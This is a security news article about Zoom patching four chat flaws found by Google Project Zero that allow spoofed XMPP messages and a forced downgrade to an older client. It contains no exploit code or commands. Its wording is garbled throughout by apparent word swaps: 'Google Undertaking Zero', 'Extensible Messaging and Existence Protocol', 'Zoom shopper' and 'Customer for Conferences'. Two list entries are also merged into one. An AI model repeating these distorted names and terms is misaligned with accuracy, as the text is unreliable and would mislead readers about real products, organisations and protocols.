Zoom, a popular video conferencing firm, has patched up to four security flaws that might be used to infect another person through chat by sending specially constructed Extensible Messaging and Existence Protocol (XMPP) messages and executing malicious code.
The concerns vary in severity from 5.9 to 8.1 when tracked from CVE-2022-22784 to CVE-2022-22787. In February 2022, Ivan Fratric of Google Undertaking Zero was credited with finding and disclosing all four issues.
The following is a list of bugs:
2022-22784 CVE (CVSS rating: 8.1) – Zoom Client for Meetings has poor XML parsing.
2022-22785 CVE (CVSS rating: 5.9) – Zoom Customer for Conferences has improperly limited session cookies.
2022-22786 CVE (CVSS score: 7.5) – Zoom Consumer for Conferences for Windows package downgrade CVE-2022-22787 (CVSS rating: 5.9) — Inadequate hostname validation during server switch in Zoom Client for Meetings
With Zoom’s chat performance built on top of the XMPP standard, successful exploitation of the issues could allow an attacker to power a vulnerable consumer to masquerade as a Zoom consumer, connect to a destructive server, and even download a rogue update, resulting in arbitrary code execution from a downgrade attack.
The zero-click on attack sequence was dubbed “XMPP Stanza Smuggling” by Fratric, who stated that “one person could possibly be capable of spoofing messages as if they were coming from another consumer” and that “an attacker can send out control messages that will be accepted as if they were coming from the server.”
At its core, the vulnerabilities take use of parsing incompatibilities in Zoom’s consumer and server XML parsers to “smuggle” arbitrary XMPP stanzas — a basic unit of interaction in XMPP — to the afflicted client.
The attack chain, in particular, may be used to hijack the software update mechanism and force the user to connect to a man-in-the-middle server that offers up an older, less secure version of the Zoom shopper.
Despite the fact that the downgrade attack targets the Windows version of the program, CVE-2022-22784, CVE-2022-22785, and CVE-2022-22787 affect Android, iOS, Linux, macOS, and Windows.
The updates come less than a month after Zoom addressed two critical problems (CVE-2022-22782 and CVE-2022-22783) that might lead to local privilege escalation and memory content disclosure in its on-premise Meeting solutions. Another downgrade attack (CVE-2022-22781) was also detected in Zoom’s macOS app.
Consumers of the program are advised to upgrade to the most recent edition (5.10) in order to prevent potential opportunity hazards resulting from active exploitation of the defects.